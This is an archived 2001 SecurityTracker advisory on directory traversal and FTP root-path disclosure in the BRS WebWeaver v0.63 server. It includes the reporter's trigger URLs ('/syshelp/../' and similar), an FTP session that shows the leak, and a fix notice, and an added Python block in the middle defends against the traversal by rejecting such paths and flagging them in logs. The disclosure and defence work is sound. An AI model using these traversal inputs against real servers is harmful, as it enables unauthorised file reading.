SecurityTracker.com
Category:   Application (Web Server/CGI)  >   BRS WebWeaver
Vendors:   Southam, Blaine R.
BRS WebWeaver Web Server Allows Remote Users to Obtain Any File on the Server
SecurityTracker Alert ID:  1001455
SecurityTracker URL:  http://securitytracker.com/id/1001455
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  May 21 2001
Original Entry Date:  Apr 28 2001
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): v0.63
Description:   A vulnerability has been reported in BRS WebWeaver, a combined FTP and web server, that allows remote users to obtain files located outside of the server's web root directory. There is also a reported vulnerability in the FTP server that allows a remote user to determine the physical path of the FTP root directory.

By using relative paths (e.g., '..', '...') in the web URL, a remote user can obtain files located anywhere on the server.

The following URLs will trigger the web server vulnerability:

http://[targethost]/syshelp/../[any file outside the web root]
http://[targethost]/sysimages/../[any file outside the web root]
http://[targethost]/scripts/../[any file outside the web root]
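One defensive check the advisory's description implies, as an added Python example (not the vendor's code and not from the advisory): a resolver that maps alias-prefixed request paths to files under the web root, rejects the '..' and '...' segments described above along with their percent-encoded and backslash variants, and a small scan of constructed access-log lines for the same pattern. The web root, the alias table and the log lines are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed values: a Unix-style web root and an alias table modelled on the
# alias names the advisory mentions ('syshelp', 'sysimages', 'scripts').
WEB_ROOT = "/srv/webweaver/wwwroot"
ALIASES = {"syshelp": "syshelp", "sysimages": "sysimages", "scripts": "cgi"}

# Constructed access-log lines in common log format for the scan below.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Apr/2001:15:57:20 -0800] "GET /syshelp/../../../autoexec.bat HTTP/1.0" 200 512',
    '10.0.0.5 - - [28/Apr/2001:15:57:21 -0800] "GET /sysimages/logo.gif HTTP/1.0" 200 2048',
]


def resolve_request_path(url_path):
    """Map a request path to a file under WEB_ROOT, or return None if it escapes.

    Two independent checks: reject any segment made only of dots ('..', and
    '...', which older Windows path handling could also treat as a parent
    reference), then confirm the normalized result is still inside the root.
    """
    path = unquote(url_path)            # '%2e%2e' must not slip past as text
    if "\x00" in path or "\\" in path:  # Windows treats '\' as a separator
        return None
    segments = [s for s in path.split("/") if s and s != "."]
    if any(seg.strip(".") == "" for seg in segments):
        return None
    if segments and segments[0] in ALIASES:
        segments[0] = ALIASES[segments[0]]
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, *segments))
    # containment check: backstop in case the segment filter is ever weakened
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


def flag_traversal_requests(log_lines):
    """Return the request paths in access-log lines that the resolver rejects,
    for reviewing logs for attempts like the advisory's '/syshelp/../' pattern."""
    flagged = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split()      # e.g. ['GET', '/path', 'HTTP/1.0']
        if len(request) >= 2 and resolve_request_path(request[1]) is None:
            flagged.append(request[1])
    return flagged
```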

The following is an illustration of the problem with the FTP server:

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>

Impact:   A remote user can obtain files located anywhere on the server and can determine the physical path of the FTP root directory.
Solution:   The vendor released a fixed version (0.64) to correct the problem. The latest version can be downloaded from http://bsoutham.home.dhs.org
Vendor URL:  bsoutham.home.dhs.org/
Cause:   Access control error, Exception handling error, Input validation error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Has Released Fix) Re: BRS WebWeaver Web Server Allows Remote Users to Obtain Any File on the Server
The vendor has released a fix.



 Source Message Contents

Date:  Sat, 28 Apr 2001 15:57:20 -0800 (PDT)
Subject:  Vulnerabilities in BRS WebWeaver



----- Begin Hush Signed Message from joetesta@hushmail.com -----

Vulnerabilities in BRS WebWeaver



    Overview

BRS WebWeaver v0.63 is a combined ftp and web server available from
http://bsoutham.home.dhs.org.  Vulnerabilities exist in the web
server which allow remote users to break out of the web root using
relative paths (ie: '..', '...').  In addition, the ftp server
can be made to disclose the physical path of the ftp root.



    Details

The following URLs demonstrate the problem with the web server:

        http://localhost/syshelp/../[any file outside the web root]
        http://localhost/sysimages/../[any file outside the web root]
        http://localhost/scripts/../[any file outside the web root]


The following is an illustration of the problem with the ftp server:

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>



    Solution

The web server root traversal vulnerabilities can be prevented by removing
all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
ISAPI/CGI alias (ie: 'scripts').  There is no solution for the ftp root
disclosure vulnerability.



    Vendor Status

Blaine R Southam was contacted via <bsoutham@iname.com> on
Saturday, April 21, 2001.  No reply was received.



    - Joe Testa

e-mail:   joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


Copyright 2013, SecurityGlobal.net LLC